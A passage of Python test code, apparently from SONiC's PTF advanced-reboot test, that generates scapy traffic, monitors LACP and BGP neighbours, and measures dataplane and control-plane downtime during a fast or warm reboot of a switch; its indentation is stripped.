self.log("DUT ssh: %s@%s" % (self.test_params['dut_username'], self.test_params['dut_hostname']))
self.log("DUT reboot limit in seconds: %s" % self.limit)
self.log("DUT mac address: %s" % self.dut_mac)
self.log("From server src addr: %s" % self.from_server_src_addr)
self.log("From server src port: %s" % self.from_server_src_port)
self.log("From server dst addr: %s" % self.from_server_dst_addr)
self.log("From server dst ports: %s" % self.from_server_dst_ports)
self.log("From upper layer number of packets: %d" % self.nr_vl_pkts)
self.log("VMs: %s" % str(self.test_params['arista_vms']))
self.log("Reboot type is %s" % self.reboot_type)
self.generate_from_t1()
self.generate_from_vlan()
self.generate_ping_dut_lo()
self.generate_arp_ping_packet()
if 'warm-reboot' in self.reboot_type:
self.log(self.get_sad_info())
# Pre-generate list of packets to be sent in send_in_background method.
generate_start = datetime.datetime.now()
if not self.vnet:
self.generate_bidirectional()
self.log("%d packets are ready after: %s" % (len(self.packets_list), str(datetime.datetime.now() - generate_start)))
self.dataplane = ptf.dataplane_instance
for p in self.dataplane.ports.values():
port = p.get_packet_source()
port.socket.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, self.SOCKET_RECV_BUFFER_SIZE)
self.dataplane.flush()
if config["log_dir"] != None:
filename = os.path.join(config["log_dir"], str(self)) + ".pcap"
self.dataplane.start_pcap(filename)
self.log("Enabling arp_responder")
self.cmd(["supervisorctl", "restart", "arp_responder"])
return
def setup_fdb(self):
""" simulate traffic generated from servers to help populate FDB """
vlan_map = self.vlan_host_map
from_servers_pkt = testutils.simple_tcp_packet(
eth_dst=self.dut_mac,
ip_dst=self.from_server_dst_addr,
)
for port in vlan_map:
for addr in vlan_map[port]:
mac = vlan_map[port][addr]
from_servers_pkt[scapy.Ether].src = self.hex_to_mac(mac)
from_servers_pkt[scapy.IP].src = addr
testutils.send(self, port, from_servers_pkt)
# make sure orchagent processed new FDBs
time.sleep(1)
def tearDown(self):
self.log("Disabling arp_responder")
self.cmd(["supervisorctl", "stop", "arp_responder"])
# Stop watching DUT
self.watching = False
if config["log_dir"] != None:
self.dataplane.stop_pcap()
self.log_fp.close()
def get_if(self, iff, cmd):
s = socket.socket()
ifreq = ioctl(s, cmd, struct.pack("16s16x",iff))
s.close()
return ifreq
@staticmethod
def hex_to_mac(hex_mac):
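# Convert a plain hex string into a colon-separated MAC address.
# Illustrative example: hex_to_mac("0242ac110002") -> "02:42:ac:11:00:02".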
return ':'.join(hex_mac[i:i+2] for i in range(0, len(hex_mac), 2))
def generate_from_t1(self):
self.from_t1 = []
# for each server host, create a packet destined to the server IP
for counter, host_port in enumerate(self.vlan_host_map):
src_addr = self.random_ip(self.default_ip_range)
src_port = self.random_port(self.portchannel_ports)
for server_ip in self.vlan_host_map[host_port]:
dst_addr = server_ip
# generate source MAC address for traffic based on LAG_BASE_MAC_PATTERN
mac_addr = self.hex_to_mac(self.LAG_BASE_MAC_PATTERN.format(counter))
packet = simple_tcp_packet(eth_src=mac_addr,
eth_dst=self.dut_mac,
ip_src=src_addr,
ip_dst=dst_addr,
ip_ttl=255,
tcp_dport=5000)
self.from_t1.append((src_port, str(packet)))
# expect any packet with dport 5000
exp_packet = simple_tcp_packet(
ip_src="0.0.0.0",
ip_dst="0.0.0.0",
tcp_dport=5000,
)
self.from_t1_exp_packet = Mask(exp_packet)
self.from_t1_exp_packet.set_do_not_care_scapy(scapy.Ether, "src")
self.from_t1_exp_packet.set_do_not_care_scapy(scapy.Ether, "dst")
self.from_t1_exp_packet.set_do_not_care_scapy(scapy.IP, "src")
self.from_t1_exp_packet.set_do_not_care_scapy(scapy.IP, "dst")
self.from_t1_exp_packet.set_do_not_care_scapy(scapy.IP, "chksum")
self.from_t1_exp_packet.set_do_not_care_scapy(scapy.TCP, "chksum")
self.from_t1_exp_packet.set_do_not_care_scapy(scapy.IP, "ttl")
def generate_from_vlan(self):
packet = simple_tcp_packet(
eth_dst=self.dut_mac,
eth_src=self.from_server_src_mac,
ip_src=self.from_server_src_addr,
ip_dst=self.from_server_dst_addr,
tcp_dport=5000
)
exp_packet = simple_tcp_packet(
ip_src=self.from_server_src_addr,
ip_dst=self.from_server_dst_addr,
ip_ttl=63,
tcp_dport=5000,
)
self.from_vlan_exp_packet = Mask(exp_packet)
self.from_vlan_exp_packet.set_do_not_care_scapy(scapy.Ether, "src")
self.from_vlan_exp_packet.set_do_not_care_scapy(scapy.Ether, "dst")
self.from_vlan_packet = str(packet)
def generate_ping_dut_lo(self):
self.ping_dut_packets = []
dut_lo_ipv4 = self.test_params['lo_prefix'].split('/')[0]
for src_port in self.vlan_host_ping_map:
src_addr = random.choice(self.vlan_host_ping_map[src_port].keys())
src_mac = self.hex_to_mac(self.vlan_host_ping_map[src_port][src_addr])
packet = simple_icmp_packet(eth_src=src_mac,
eth_dst=self.dut_mac,
ip_src=src_addr,
ip_dst=dut_lo_ipv4)
self.ping_dut_packets.append((src_port, str(packet)))
exp_packet = simple_icmp_packet(eth_src=self.dut_mac,
ip_src=dut_lo_ipv4,
icmp_type='echo-reply')
self.ping_dut_macjump_packet = simple_icmp_packet(eth_dst=self.dut_mac,
ip_src=self.from_server_src_addr,
ip_dst=dut_lo_ipv4)
self.ping_dut_exp_packet = Mask(exp_packet)
self.ping_dut_exp_packet.set_do_not_care_scapy(scapy.Ether, "dst")
self.ping_dut_exp_packet.set_do_not_care_scapy(scapy.IP, "dst")
self.ping_dut_exp_packet.set_do_not_care_scapy(scapy.IP, "id")
self.ping_dut_exp_packet.set_do_not_care_scapy(scapy.IP, "chksum")
def generate_arp_ping_packet(self):
vlan = next(k for k, v in self.ports_per_vlan.items() if v)
vlan_ip_range = self.vlan_ip_range[vlan]
vlan_port_candidates = range(len(self.ports_per_vlan[vlan]))
vlan_port_candidates.remove(0) # subnet prefix
vlan_port_candidates.remove(1) # subnet IP on dut
src_idx = random.choice(vlan_port_candidates)
vlan_port_candidates.remove(src_idx)
dst_idx = random.choice(vlan_port_candidates)
src_port = self.ports_per_vlan[vlan][src_idx]
dst_port = self.ports_per_vlan[vlan][dst_idx]
src_addr = self.host_ip(vlan_ip_range, src_idx)
dst_addr = self.host_ip(vlan_ip_range, dst_idx)
src_mac = self.hex_to_mac(self.vlan_host_map[src_port][src_addr])
packet = simple_arp_packet(eth_src=src_mac, arp_op=1, ip_snd=src_addr, ip_tgt=dst_addr, hw_snd=src_mac)
expect = simple_arp_packet(eth_dst=src_mac, arp_op=2, ip_snd=dst_addr, ip_tgt=src_addr, hw_tgt=src_mac)
self.log("ARP ping: src idx %d port %d mac %s addr %s" % (src_idx, src_port, src_mac, src_addr))
self.log("ARP ping: dst idx %d port %d addr %s" % (dst_idx, dst_port, dst_addr))
self.arp_ping = str(packet)
self.arp_resp = Mask(expect)
self.arp_resp.set_do_not_care_scapy(scapy.Ether, 'src')
self.arp_resp.set_do_not_care_scapy(scapy.ARP, 'hwtype')
self.arp_resp.set_do_not_care_scapy(scapy.ARP, 'hwsrc')
self.arp_src_port = src_port
def generate_bidirectional(self):
"""
This method is used to pre-generate packets to be sent in background thread.
Packets are composed into a list and represent a bidirectional flow:
out of every five packets, one is sent from the VLAN side and four from T1.
Each packet has sequential TCP Payload - to be identified later.
"""
self.send_interval = self.time_to_listen / self.packets_to_send
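# Recompute the inter-packet interval so that the full packet list spans time_to_listen.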
self.packets_list = []
from_t1_iter = itertools.cycle(self.from_t1)
sent_count_vlan_to_t1 = 0
sent_count_t1_to_vlan = 0
for i in xrange(self.packets_to_send):
payload = '0' * 60 + str(i)
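# The zero padding only keeps the payload at a fixed minimum size;
# int(payload) still evaluates to the sequence number i, which examine_flow() relies on.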
if (i % 5) == 0 : # From vlan to T1.
packet = scapyall.Ether(self.from_vlan_packet)
packet.load = payload
from_port = self.from_server_src_port
sent_count_vlan_to_t1 += 1
else: # From T1 to vlan.
src_port, packet = next(from_t1_iter)
packet = scapyall.Ether(packet)
packet.load = payload
from_port = src_port
sent_count_t1_to_vlan += 1
self.packets_list.append((from_port, str(packet)))
self.log("Sent prep count vlan to t1: {}".format(sent_count_vlan_to_t1))
self.log("Sent prep count t1 to vlan: {}".format(sent_count_t1_to_vlan))
def put_nowait(self, queue, data):
try:
queue.put_nowait(data)
except Queue.Full:
pass
def pre_reboot_test_setup(self):
self.reboot_start = None
self.no_routing_start = None
self.no_routing_stop = None
self.no_control_start = None
self.no_control_stop = None
self.no_cp_replies = None
self.upper_replies = []
self.routing_always = False
self.total_disrupt_packets = None
self.total_disrupt_time = None
self.ssh_jobs = []
self.lacp_session_pause = dict()
for addr in self.ssh_targets:
q = Queue.Queue(1)
self.lacp_session_pause[addr] = None
thr = threading.Thread(target=self.peer_state_check, kwargs={'ip': addr, 'queue': q})
thr.setDaemon(True)
self.ssh_jobs.append((thr, q))
thr.start()
if self.setup_fdb_before_test:
self.log("Run some server traffic to populate FDB table...")
self.setup_fdb()
self.log("Starting reachability state watch thread...")
self.watching = True
self.light_probe = False
self.watcher_is_stopped = threading.Event() # Waiter Event for the Watcher state is stopped.
self.watcher_is_running = threading.Event() # Waiter Event for the Watcher state is running.
self.watcher_is_stopped.set() # By default the Watcher is not running.
self.watcher_is_running.clear() # By default its required to wait for the Watcher started.
# Give watch thread some time to wind up
watcher = self.pool.apply_async(self.reachability_watcher)
time.sleep(5)
def get_warmboot_finalizer_state(self):
stdout, stderr, _ = self.dut_connection.execCommand('sudo systemctl is-active warmboot-finalizer.service')
if stderr:
self.fails['dut'].add("Error collecting Finalizer state. stderr: {}, stdout:{}".format(str(stderr), str(stdout)))
raise Exception("Error collecting Finalizer state. stderr: {}, stdout:{}".format(str(stderr), str(stdout)))
if not stdout:
self.log('Finalizer state not returned from DUT')
return ''
finalizer_state = stdout[0].strip()
return finalizer_state
def get_now_time(self):
stdout, stderr, _ = self.dut_connection.execCommand('date +"%Y-%m-%d %H:%M:%S"')
if stderr:
self.fails['dut'].add("Error collecting current date from DUT. stderr: {}, stdout:{}".format(str(stderr), str(stdout)))
raise Exception("Error collecting current date from DUT. stderr: {}, stdout:{}".format(str(stderr), str(stdout)))
if not stdout:
self.fails['dut'].add('Error collecting current date from DUT: empty value returned')
raise Exception('Error collecting current date from DUT: empty value returned')
return datetime.datetime.strptime(stdout[0].strip(), "%Y-%m-%d %H:%M:%S")
def check_warmboot_finalizer(self, finalizer_timeout):
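# Track the warmboot-finalizer systemd unit: first wait (up to finalizer_timeout)
# for it to enter the "activating" state, then poll every 10 seconds until it
# leaves that state, bounded by warm_up_timeout_secs.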
self.wait_until_control_plane_up()
dut_datetime = self.get_now_time()
self.log('waiting for warmboot-finalizer service to become activating')
finalizer_state = self.get_warmboot_finalizer_state()
while finalizer_state != 'activating':
time.sleep(1)
dut_datetime_after_ssh = self.get_now_time()
time_passed = float(dut_datetime_after_ssh.strftime("%s")) - float(dut_datetime.strftime("%s"))
if time_passed > finalizer_timeout:
self.fails['dut'].add('warmboot-finalizer never reached state "activating"')
raise TimeoutError
finalizer_state = self.get_warmboot_finalizer_state()
self.log('waiting for warmboot-finalizer service to finish')
finalizer_state = self.get_warmboot_finalizer_state()
self.log('warmboot finalizer service state {}'.format(finalizer_state))
count = 0
while finalizer_state == 'activating':
finalizer_state = self.get_warmboot_finalizer_state()
self.log('warmboot finalizer service state {}'.format(finalizer_state))
time.sleep(10)
if count * 10 > int(self.test_params['warm_up_timeout_secs']):
self.fails['dut'].add('warmboot-finalizer.service did not finish')
raise TimeoutError
count += 1
self.log('warmboot-finalizer service finished')
def wait_until_control_plane_down(self):
self.log("Wait until Control plane is down")
self.timeout(self.wait_until_cpu_port_down, self.task_timeout, "DUT hasn't shutdown in {} seconds".format(self.task_timeout))
if self.reboot_type == 'fast-reboot':
self.light_probe = True
else:
# add or del routes during boot
self.do_inboot_oper()
self.reboot_start = datetime.datetime.now()
self.log("Dut reboots: reboot start %s" % str(self.reboot_start))
def wait_until_control_plane_up(self):
self.log("Wait until Control plane is up")
self.timeout(self.wait_until_cpu_port_up, self.task_timeout, "DUT hasn't come back up in {} seconds".format(self.task_timeout))
self.no_control_stop = datetime.datetime.now()
self.log("Dut reboots: control plane up at %s" % str(self.no_control_stop))
def handle_fast_reboot_health_check(self):
self.log("Check that device is still forwarding data plane traffic")
self.fails['dut'].add("Data plane has a forwarding problem after CPU went down")
self.check_alive()
self.fails['dut'].clear()
self.sniff_thr.join()
self.sender_thr.join()
# Stop watching DUT
self.watching = False
self.log("Stopping reachability state watch thread.")
self.watcher_is_stopped.wait(timeout = 10) # Wait for the Watcher stopped.
examine_start = datetime.datetime.now()
self.log("Packet flow examine started %s after the reboot" % str(examine_start - self.reboot_start))
self.examine_flow()
self.log("Packet flow examine finished after %s" % str(datetime.datetime.now() - examine_start))
if self.lost_packets:
self.no_routing_stop, self.no_routing_start = datetime.datetime.fromtimestamp(self.no_routing_stop), datetime.datetime.fromtimestamp(self.no_routing_start)
self.log("Dataplane disruption lasted %.3f seconds. %d packet(s) lost." % (self.max_disrupt_time, self.max_lost_id))
self.log("Total disruptions count is %d. All disruptions lasted %.3f seconds. Total %d packet(s) lost" % \
(self.disrupts_count, self.total_disrupt_time, self.total_disrupt_packets))
else:
self.no_routing_start = self.reboot_start
self.no_routing_stop = self.reboot_start
def handle_warm_reboot_health_check(self):
self.sniff_thr.join()
self.sender_thr.join()
# Stop watching DUT
self.watching = False
self.log("Stopping reachability state watch thread.")
self.watcher_is_stopped.wait(timeout = 10) # Wait for the Watcher stopped.
examine_start = datetime.datetime.now()
self.log("Packet flow examine started %s after the reboot" % str(examine_start - self.reboot_start))
self.examine_flow()
self.log("Packet flow examine finished after %s" % str(datetime.datetime.now() - examine_start))
if self.lost_packets:
self.no_routing_stop, self.no_routing_start = datetime.datetime.fromtimestamp(self.no_routing_stop), datetime.datetime.fromtimestamp(self.no_routing_start)
self.log("The longest disruption lasted %.3f seconds. %d packet(s) lost." % (self.max_disrupt_time, self.max_lost_id))
self.log("Total disruptions count is %d. All disruptions lasted %.3f seconds. Total %d packet(s) lost" % \
(self.disrupts_count, self.total_disrupt_time, self.total_disrupt_packets))
else:
self.no_routing_start = self.reboot_start
self.no_routing_stop = self.reboot_start
def handle_post_reboot_health_check(self):
# wait until all bgp session are established
self.log("Wait until bgp routing is up on all devices")
for _, q in self.ssh_jobs:
q.put('quit')
def wait_for_ssh_threads(signal):
while any(thr.is_alive() for thr, _ in self.ssh_jobs) and not signal.is_set():
self.log('Waiting till SSH threads stop')
time.sleep(self.TIMEOUT)
for thr, _ in self.ssh_jobs:
thr.join()
self.timeout(wait_for_ssh_threads, self.task_timeout, "SSH threads haven't finished for %d seconds" % self.task_timeout)
self.log("Data plane works again. Start time: %s" % str(self.no_routing_stop))
self.log("")
if self.no_routing_stop - self.no_routing_start > self.limit:
self.fails['dut'].add("Longest downtime period must be less then %s seconds. It was %s" \
% (self.test_params['reboot_limit_in_seconds'], str(self.no_routing_stop - self.no_routing_start)))
if self.no_routing_stop - self.reboot_start > datetime.timedelta(seconds=self.test_params['graceful_limit']):
self.fails['dut'].add("%s cycle must be less than graceful limit %s seconds" % (self.reboot_type, self.test_params['graceful_limit']))
if self.total_disrupt_time > self.limit.total_seconds():
self.fails['dut'].add("Total downtime period must be less then %s seconds. It was %s" \
% (str(self.limit), str(self.total_disrupt_time)))
if 'warm-reboot' in self.reboot_type:
# after the data plane is up, check for routing changes
if self.test_params['inboot_oper'] and self.sad_handle:
self.check_inboot_sad_status()
# postboot check for all preboot operations
if self.test_params['preboot_oper'] and self.sad_handle:
self.check_postboot_sad_status()
else:
# verify there are no interface flaps after warm boot
self.neigh_lag_status_check()
def handle_advanced_reboot_health_check_kvm(self):
self.log("Wait until data plane stops")
forward_stop_signal = multiprocessing.Event()
async_forward_stop = self.pool.apply_async(self.check_forwarding_stop, args=(forward_stop_signal,))
self.log("Wait until control plane up")
port_up_signal = multiprocessing.Event()
async_cpu_up = self.pool.apply_async(self.wait_until_cpu_port_up, args=(port_up_signal,))
try:
self.no_routing_start, _ = async_forward_stop.get(timeout=self.task_timeout)
self.log("Data plane was stopped, Waiting until it's up. Stop time: %s" % str(self.no_routing_start))
except TimeoutError:
forward_stop_signal.set()
self.log("Data plane never stop")
try:
async_cpu_up.get(timeout=self.task_timeout)
no_control_stop = self.cpu_state.get_state_time('up')
self.log("Control plane down stops %s" % str(no_control_stop))
except TimeoutError as e:
port_up_signal.set()
self.log("DUT hasn't bootup in %d seconds" % self.task_timeout)
self.fails['dut'].add("DUT hasn't booted up in %d seconds" % self.task_timeout)
raise
# Wait until data plane up if it stopped
if self.no_routing_start is not None:
self.no_routing_stop, _ = self.timeout(self.check_forwarding_resume,
self.task_timeout,
"DUT hasn't started to work for %d seconds" % self.task_timeout)
else:
self.no_routing_stop = datetime.datetime.min
self.no_routing_start = datetime.datetime.min
# Stop watching DUT
self.watching = False
def handle_post_reboot_health_check_kvm(self):
# wait until all bgp session are established
self.log("Wait until bgp routing is up on all devices")
for _, q in self.ssh_jobs:
q.put('quit')
def wait_for_ssh_threads(signal):
while any(thr.is_alive() for thr, _ in self.ssh_jobs) and not signal.is_set():
time.sleep(self.TIMEOUT)
for thr, _ in self.ssh_jobs:
thr.join()
self.timeout(wait_for_ssh_threads, self.task_timeout, "SSH threads haven't finished for %d seconds" % self.task_timeout)
self.log("Data plane works again. Start time: %s" % str(self.no_routing_stop))
self.log("")
if self.no_routing_stop - self.no_routing_start > self.limit:
self.fails['dut'].add("Longest downtime period must be less then %s seconds. It was %s" \
% (self.test_params['reboot_limit_in_seconds'], str(self.no_routing_stop - self.no_routing_start)))
if self.no_routing_stop - self.reboot_start > datetime.timedelta(seconds=self.test_params['graceful_limit']):
self.fails['dut'].add("%s cycle must be less than graceful limit %s seconds" % (self.reboot_type, self.test_params['graceful_limit']))
def handle_post_reboot_test_reports(self):
# Stop watching DUT
self.watching = False
# revert to pretest state
if self.sad_oper and self.sad_handle:
self.sad_revert()
if self.test_params['inboot_oper']:
self.check_postboot_sad_status()
self.log(" ")
# Generating report
self.log("="*50)
self.log("Report:")
self.log("="*50)
self.log("LACP/BGP were down for (extracted from cli):")
self.log("-"*50)
for ip in sorted(self.cli_info.keys()):
self.log(" %s - lacp: %7.3f (%d) po_events: (%d) bgp v4: %7.3f (%d) bgp v6: %7.3f (%d)" \
% (ip, self.cli_info[ip]['lacp'][1], self.cli_info[ip]['lacp'][0], \
self.cli_info[ip]['po'][1], \
self.cli_info[ip]['bgp_v4'][1], self.cli_info[ip]['bgp_v4'][0],\
self.cli_info[ip]['bgp_v6'][1], self.cli_info[ip]['bgp_v6'][0]))
self.log("-"*50)
self.log("Extracted from VM logs:")
self.log("-"*50)
for ip in sorted(self.logs_info.keys()):
self.log("Extracted log info from %s" % ip)
for msg in sorted(self.logs_info[ip].keys()):
if not msg in [ 'error', 'route_timeout' ]:
self.log(" %s : %d" % (msg, self.logs_info[ip][msg]))
else:
self.log(" %s" % self.logs_info[ip][msg])
self.log("-"*50)
self.log("Summary:")
self.log("-"*50)
if self.no_routing_stop:
self.log("Longest downtime period was %s" % str(self.no_routing_stop - self.no_routing_start))
reboot_time = "0:00:00" if self.routing_always else str(self.no_routing_stop - self.reboot_start)
self.log("Reboot time was %s" % reboot_time)
self.log("Expected downtime is less then %s" % self.limit)
if self.reboot_type == 'fast-reboot' and self.no_cp_replies:
self.log("How many packets were received back when control plane was down: %d Expected: %d" % (self.no_cp_replies, self.nr_vl_pkts))
has_info = any(len(info) > 0 for info in self.info.values())
if has_info:
self.log("-"*50)
self.log("Additional info:")
self.log("-"*50)
for name, info in self.info.items():
for entry in info:
self.log("INFO:%s:%s" % (name, entry))
self.log("-"*50)
is_good = all(len(fails) == 0 for fails in self.fails.values())
errors = ""
if not is_good:
self.log("-"*50)
self.log("Fails:")
self.log("-"*50)
errors = "\n\nSomething went wrong. Please check output below:\n\n"
for name, fails in self.fails.items():
for fail in fails:
self.log("FAILED:%s:%s" % (name, fail))
errors += "FAILED:%s:%s\n" % (name, fail)
self.log("="*50)
if self.no_routing_stop and self.no_routing_start:
dataplane_downtime = (self.no_routing_stop - self.no_routing_start).total_seconds()
else:
dataplane_downtime = ""
if self.total_disrupt_time:
# Add total downtime (calculated in physical warmboot test using packet disruptions)
dataplane_downtime = self.total_disrupt_time
dataplane_report = dict()
dataplane_report["downtime"] = str(dataplane_downtime)
dataplane_report["lost_packets"] = str(self.total_disrupt_packets) \
if self.total_disrupt_packets is not None else ""
controlplane_report = dict()
if self.no_control_stop and self.no_control_start:
controlplane_downtime = (self.no_control_stop - self.no_control_start).total_seconds()
else:
controlplane_downtime = ""
controlplane_report["downtime"] = str(controlplane_downtime)
controlplane_report["arp_ping"] = "" # TODO
controlplane_report["lacp_sessions"] = self.lacp_session_pause
self.report["dataplane"] = dataplane_report
self.report["controlplane"] = controlplane_report
with open(self.report_file_name, 'w') as reportfile:
json.dump(self.report, reportfile)
self.assertTrue(is_good, errors)
def runTest(self):
self.pre_reboot_test_setup()
try:
self.log("Check that device is alive and pinging")
self.fails['dut'].add("DUT is not ready for test")
self.wait_dut_to_warm_up()
self.fails['dut'].clear()
self.clear_dut_counters()
self.log("Schedule to reboot the remote switch in %s sec" % self.reboot_delay)
thr = threading.Thread(target=self.reboot_dut)
thr.setDaemon(True)
thr.start()
self.wait_until_control_plane_down()
self.no_control_start = self.cpu_state.get_state_time('down')
if 'warm-reboot' in self.reboot_type:
finalizer_timeout = 60 + self.test_params['reboot_limit_in_seconds']
thr = threading.Thread(target=self.check_warmboot_finalizer,\
kwargs={'finalizer_timeout': finalizer_timeout})
thr.setDaemon(True)
thr.start()
self.warmboot_finalizer_thread = thr
if self.kvm_test:
self.handle_advanced_reboot_health_check_kvm()
self.handle_post_reboot_health_check_kvm()
else:
if self.reboot_type == 'fast-reboot':
self.handle_fast_reboot_health_check()
if 'warm-reboot' in self.reboot_type:
self.handle_warm_reboot_health_check()
self.handle_post_reboot_health_check()
if 'warm-reboot' in self.reboot_type:
total_timeout = finalizer_timeout + self.test_params['warm_up_timeout_secs']
start_time = datetime.datetime.now()
# Wait until timeout happens OR the IO test completes
while ((datetime.datetime.now() - start_time).seconds < total_timeout) and\
self.warmboot_finalizer_thread.is_alive():
time.sleep(0.5)
if self.warmboot_finalizer_thread.is_alive():
self.fails['dut'].add("Warmboot Finalizer hasn't finished for {} seconds. Finalizer state: {}".format(total_timeout, self.get_warmboot_finalizer_state()))
# Check sonic version after reboot
self.check_sonic_version_after_reboot()
except Exception as e:
self.fails['dut'].add(e)
finally:
self.handle_post_reboot_test_reports()
def neigh_lag_status_check(self):
"""
Ensure there are no interface flaps after warm-boot
"""
for neigh in self.ssh_targets:
self.neigh_handle = Arista(neigh, None, self.test_params)
self.neigh_handle.connect()
fails, flap_cnt = self.neigh_handle.verify_neigh_lag_no_flap()
self.neigh_handle.disconnect()
self.fails[neigh] |= fails
if not flap_cnt:
self.log("No LAG flaps seen on %s after warm boot" % neigh)
else:
self.fails[neigh].add("LAG flapped %s times on %s after warm boot" % (flap_cnt, neigh))
def check_sonic_version_after_reboot(self):
# Check sonic version after reboot
target_version = self.test_params['target_version']
if target_version:
stdout, stderr, return_code = self.dut_connection.execCommand("sudo sonic_installer list | grep Current | awk '{print $2}'")
current_version = ""
if stdout != []:
current_version = str(stdout[0]).replace('\n', '')
self.log("Current={} Target={}".format(current_version, target_version))
if current_version != target_version:
raise Exception("Sonic upgrade failed. Target={} Current={}".format(\
target_version, current_version))
def extract_no_cpu_replies(self, arr):
"""
This function tries to extract the number of replies from the data plane while the control plane is not working
"""
# drop all zero values
non_zero = filter(lambda x : x > 0, arr)
# if the last value dipped compared to the previous one, take the previous value
if len(non_zero) > 1 and non_zero[-1] < non_zero[-2]:
return non_zero[-2]
else:
return non_zero[-1]
def reboot_dut(self):
time.sleep(self.reboot_delay)
if not self.kvm_test and\
(self.reboot_type == 'fast-reboot' or 'warm-reboot' in self.reboot_type):
self.sender_thr = threading.Thread(target = self.send_in_background)
self.sniff_thr = threading.Thread(target = self.sniff_in_background)
self.sniffer_started = threading.Event() # Event for the sniff_in_background status.
self.sniff_thr.start()
self.sender_thr.start()
self.log("Rebooting remote side")
stdout, stderr, return_code = self.dut_connection.execCommand("sudo " + self.reboot_type, timeout=30)
if stdout != []:
self.log("stdout from %s: %s" % (self.reboot_type, str(stdout)))
if stderr != []:
self.log("stderr from %s: %s" % (self.reboot_type, str(stderr)))
self.fails['dut'].add("{} failed with error {}".format(self.reboot_type, stderr))
thread.interrupt_main()
raise Exception("{} failed with error {}".format(self.reboot_type, stderr))
self.log("return code from %s: %s" % (self.reboot_type, str(return_code)))
# Note: a timeout reboot in ssh session will return a 255 code
if return_code not in [0, 255]:
thread.interrupt_main()
return
def cmd(self, cmds):
process = subprocess.Popen(cmds,
shell=False,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = process.communicate()
return_code = process.returncode
return stdout, stderr, return_code
def peer_state_check(self, ip, queue):
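# Per-neighbor SSH worker: collects LACP/BGP state from the Arista VM and
# derives how long LACP PDUs were paused around the reboot.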
self.log('SSH thread for VM {} started'.format(ip))
ssh = Arista(ip, queue, self.test_params, log_cb=self.log)
self.fails[ip], self.info[ip], self.cli_info[ip], self.logs_info[ip], self.lacp_pdu_times[ip] = ssh.run()
self.log('SSH thread for VM {} finished'.format(ip))
lacp_pdu_times = self.lacp_pdu_times[ip]
lacp_pdu_down_times = lacp_pdu_times.get("lacp_down")
lacp_pdu_up_times = lacp_pdu_times.get("lacp_up")
self.log('lacp_pdu_down_times: IP:{}: {}'.format(ip, lacp_pdu_down_times))
self.log('lacp_pdu_up_times: IP:{}: {}'.format(ip, lacp_pdu_up_times))
lacp_pdu_before_reboot = float(lacp_pdu_down_times[-1]) if\
lacp_pdu_down_times and len(lacp_pdu_down_times) > 0 else None
lacp_pdu_after_reboot = float(lacp_pdu_up_times[0]) if\
lacp_pdu_up_times and len(lacp_pdu_up_times) > 0 else None
if 'warm-reboot' in self.reboot_type and lacp_pdu_before_reboot and lacp_pdu_after_reboot:
lacp_time_diff = lacp_pdu_after_reboot - lacp_pdu_before_reboot
if lacp_time_diff >= 90 and not self.kvm_test:
self.fails['dut'].add("LACP session likely terminated by neighbor ({})".format(ip) +\
" post-reboot lacpdu came after {}s of lacpdu pre-boot".format(lacp_time_diff))
else:
lacp_time_diff = None
self.lacp_session_pause[ip] = lacp_time_diff
def wait_until_cpu_port_down(self, signal):
while not signal.is_set():
for _, q in self.ssh_jobs:
self.put_nowait(q, 'cpu_going_down')
if self.cpu_state.get() == 'down':
for _, q in self.ssh_jobs:
q.put('cpu_down')
break
time.sleep(self.TIMEOUT)
def wait_until_cpu_port_up(self, signal):
while not signal.is_set():
for _, q in self.ssh_jobs:
self.put_nowait(q, 'cpu_going_up')
if self.cpu_state.get() == 'up':
for _, q in self.ssh_jobs:
q.put('cpu_up')
break
time.sleep(self.TIMEOUT)
def apply_filter_all_ports(self, filter_expression):
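# Attach a BPF capture filter to the raw socket of every PTF dataplane port;
# the sender resets it with an empty filter expression once it finishes.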
for p in self.dataplane.ports.values():
port = p.get_packet_source()
scapyall.attach_filter(port.socket, filter_expression)
def send_in_background(self, packets_list = None, interval = None):
"""
This method sends predefined list of packets with predefined interval.
"""
if not interval:
interval = self.send_interval
if not packets_list:
packets_list = self.packets_list
self.sniffer_started.wait(timeout=10)
with self.dataplane_io_lock:
sent_packet_count = 0
# While running fast data plane sender thread there are two reasons for filter to be applied
# 1. filter out data plane traffic which is tcp to free up the load on PTF socket (sniffer thread is using a different one)
# 2. during warm neighbor restoration DUT will send a lot of ARP requests which we are not interested in
# This is essential to get stable results
self.apply_filter_all_ports('not (arp and ether src {}) and not tcp'.format(self.test_params['dut_mac']))
sender_start = datetime.datetime.now()
self.log("Sender started at %s" % str(sender_start))
for entry in packets_list:
time.sleep(interval)
if self.vnet:
testutils.send_packet(self, entry[0], entry[1].decode("base64"))
else:
testutils.send_packet(self, *entry)
sent_packet_count += 1
self.log("Sender has been running for %s" % str(datetime.datetime.now() - sender_start))
self.log("Total sent packets by sender: {}".format(sent_packet_count))
# Signal sniffer thread to allow early finish.
# Without this signalling mechanism, the sniffer thread can continue for a hardcoded max time.
# Sometimes this max time is too long and sniffer keeps running too long after sender finishes.
# Other times, sniffer finishes too early (when max time is less) while the sender is still sending packets.
# So now:
# 1. sniffer max timeout is increased (to prevent sniffer finish before sender)
# 2. and sender can signal sniffer to end after all packets are sent.
time.sleep(1)
kill_sniffer_cmd = "pkill -SIGINT -f {}".format(self.ptf_sniffer)
subprocess.Popen(kill_sniffer_cmd.split())
self.apply_filter_all_ports('')
def sniff_in_background(self, wait = None):
"""
This function listens on all ports, in both directions, for the TCP src=1234 dst=5000 packets, until timeout.
Once found, all packets are dumped to local pcap file,
and all packets are saved to self.packets as scapy type.
The sniffer runs in a background thread, to allow a delayed start of send_in_background().
"""
if not wait:
wait = self.time_to_listen + self.test_params['sniff_time_incr']
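# Total listen time is the traffic duration plus a configurable safety margin (sniff_time_incr).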
sniffer_start = datetime.datetime.now()
self.log("Sniffer started at %s" % str(sniffer_start))
sniff_filter = "tcp and tcp dst port 5000 and tcp src port 1234 and not icmp"
scapy_sniffer = threading.Thread(target=self.scapy_sniff,
kwargs={'wait': wait, 'sniff_filter': sniff_filter})
scapy_sniffer.start()
time.sleep(2) # Let the scapy sniff initialize completely.
self.sniffer_started.set() # Unblock waiter for the send_in_background.
scapy_sniffer.join()
self.log("Sniffer has been running for %s" % str(datetime.datetime.now() - sniffer_start))
self.sniffer_started.clear()
def scapy_sniff(self, wait=300, sniff_filter=''):
"""
@summary: PTF runner - runs a sniffer in PTF container.
Args:
wait (int): Duration in seconds to sniff the traffic
sniff_filter (str): Filter that Scapy will use to collect only relevant packets
"""
